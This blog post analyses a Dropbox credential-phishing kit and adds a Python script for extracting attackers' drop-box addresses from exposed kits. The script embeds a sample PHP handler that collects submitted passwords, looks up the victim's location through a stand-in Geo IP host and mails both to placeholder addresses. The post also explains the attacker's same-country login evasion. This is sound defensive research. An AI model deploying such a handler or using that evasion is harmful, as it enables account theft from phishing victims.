Monday, 31 August 2015

Dropbox Credential Phishing Campaign

The Dropbox credential phishing campaign has been active for quite some time. In this article I will share some interesting details about it.

The attackers send an email containing a URL; the page it leads to asks you to enter your username and password to view a shared document.

Figure 1: Login using your Email address and Password to view the Shared Document:

As shown in Figure 1, a static HTML login page is used to phish the credentials. There are a few variants of this login page, which I will discuss later.

Now, here is the interesting thing. The attacker did not change the Apache web server settings to disable directory listing. We see this frequently with credential phishing: the attackers who deploy these kits rarely turn directory indexing off, so the kit's source is left exposed to anyone who looks.

We can browse the directories and find the zip archive, as shown below:

Figure 2: Dropbox Phishing Archive found on the Server:

We can download the Phishing Archive and view the contents as shown in Figure 3.

Figure 3: Dropbox Phishing Archive contents:

If we view the HTML login form on this phishing site, we can see that the form's action attribute points to finish.php, as shown in Figure 4.

Figure 4: HTML Form Login page:

Using Mozilla Firefox's Web Console we can quickly inspect the login form and read its action attribute, as shown in Figure 4. Now let us find finish.php in the archive we downloaded and view its source code. We can see that the credentials are read from the submitted form and emailed to:

Figure 5: Server Side code of Phishing:

We also notice one extra thing the PHP code above does in addition to mailing the phished credentials: it collects geographic information about the victim using a Geo IP lookup service: This information is sent to the attacker in the same email as the credentials. The reason is that popular mail services such as Gmail and Yahoo flag logins coming from an unfamiliar geographic location. Knowing the victim's location, the attacker can log in through a proxy or VPN exit in the same country and read the victim's email without the login looking anomalous.

Now let us take this one step further and collect other links from the Internet related to the same phishing campaign. I found a total of 751 phishing URLs, which are posted here:

We can apply the method discussed in this article to each of these URLs to obtain the list of the attackers' email addresses. I will soon post a list of all the email addresses.
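The three steps described above (spotting an exposed Apache directory listing, locating the form handler that the login page posts to, and pulling the recipient address out of the PHP that mails the credentials) are easy to automate once you have a list of URLs. The script below is an added example written for this article, not code from the phishing kit or from the original post. Everything it works on is constructed inline: the "Index of" page, the login form, the finish.php handler and the email addresses (which use the reserved .invalid domain) are all made up to mirror the kit described here, and no network requests are made. To run it against a real kit you would fetch the directory listing and archive yourself and feed the bytes to the same functions.

```python
"""Triage helpers for a PHP credential-phishing kit (constructed example).

Workflow mirrored from the article: detect an exposed Apache directory
listing, find the kit archive, locate the form handler, and recover the
attacker's drop-box address from the PHP source. All inputs are constructed.
"""
import io
import re
import zipfile

# Constructed Apache "Index of" page, as served when the web server's
# directory indexing (Options Indexes) has not been disabled.
SAMPLE_LISTING = """<html><head><title>Index of /share</title></head><body>
<h1>Index of /share</h1>
<ul><li><a href="/">Parent Directory</a></li>
<li><a href="index.html">index.html</a></li>
<li><a href="finish.php">finish.php</a></li>
<li><a href="dropbox.zip">dropbox.zip</a></li></ul></body></html>"""

# Constructed login page: the form posts to finish.php, as in Figure 4.
SAMPLE_INDEX_HTML = """<form method="post" action="finish.php">
<input name="email"><input name="password" type="password">
<input type="submit" value="Sign in"></form>"""

# Constructed handler modelled on the behaviour described in the article:
# mail the credentials plus a Geo IP lookup result, then redirect the victim.
# The addresses and lookup host are hypothetical (.invalid is reserved).
SAMPLE_FINISH_PHP = r"""<?php
$email = $_POST['email']; $password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$geo = file_get_contents("http://geoip.example.invalid/json/$ip");
$msg = "Email: $email\nPass: $password\nIP: $ip\nGeo: $geo\n";
$to = "dropbox.results@example.invalid";
mail($to, "Dropbox ReZulT", $msg);
mail("backup.copy@example.invalid", "Dropbox ReZulT", $msg);
header("Location: https://www.dropbox.com/");
?>"""

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def is_directory_listing(html):
    """True when the page is an Apache auto-generated index (directory listing left on)."""
    return re.search(r"<title>\s*Index of\s", html, re.I) is not None


def find_archives(html):
    """Return the .zip links found in a directory listing (the kit the attacker uploaded)."""
    return sorted(set(re.findall(r'href="([^"]+\.zip)"', html, re.I)))


def build_sample_kit():
    """Pack the constructed page and handler into an in-memory zip, standing in for the download."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("dropbox/index.html", SAMPLE_INDEX_HTML)
        zf.writestr("dropbox/finish.php", SAMPLE_FINISH_PHP)
    return buf.getvalue()


def form_actions(html):
    """Return the action attribute of every <form> in the page (what the Web Console showed)."""
    return re.findall(r'<form[^>]*\baction="([^"]+)"', html, re.I)


def mail_recipients(php_source):
    """Resolve the first argument of each mail() call, following simple $var = "..." assignments."""
    assignments = dict(re.findall(r'\$(\w+)\s*=\s*"([^"]*)"', php_source))
    recipients = []
    for arg in re.findall(r"\bmail\s*\(\s*([^,]+),", php_source):
        arg = arg.strip()
        if arg.startswith("$"):
            arg = assignments.get(arg[1:], "")
        recipients.extend(EMAIL_RE.findall(arg))
    return recipients


def analyse_kit(zip_bytes):
    """Return the form handlers, the mail() recipients in those handlers, and whether Geo IP is used."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        members = {n: zf.read(n).decode("utf-8", "replace") for n in zf.namelist()}
    handlers = set()
    for name, text in members.items():
        if name.lower().endswith((".html", ".htm")):
            handlers.update(form_actions(text))
    recipients, geoip = [], False
    for name, text in members.items():
        if name.lower().endswith(".php") and name.rsplit("/", 1)[-1] in handlers:
            recipients.extend(mail_recipients(text))
            geoip = geoip or re.search(r"geoip|ipinfo|ip-api", text, re.I) is not None
    return {"handlers": sorted(handlers), "recipients": sorted(set(recipients)), "geoip": geoip}


if __name__ == "__main__":
    if is_directory_listing(SAMPLE_LISTING):
        print("directory listing exposed; archives:", find_archives(SAMPLE_LISTING))
    print(analyse_kit(build_sample_kit()))
```

The resolver deliberately follows only direct string assignments to the variable passed to mail(). Kits often keep the address in a separate include, build it with string concatenation or decode it from base64 at runtime, so an empty recipients list means "look at the PHP by hand", not "no drop box".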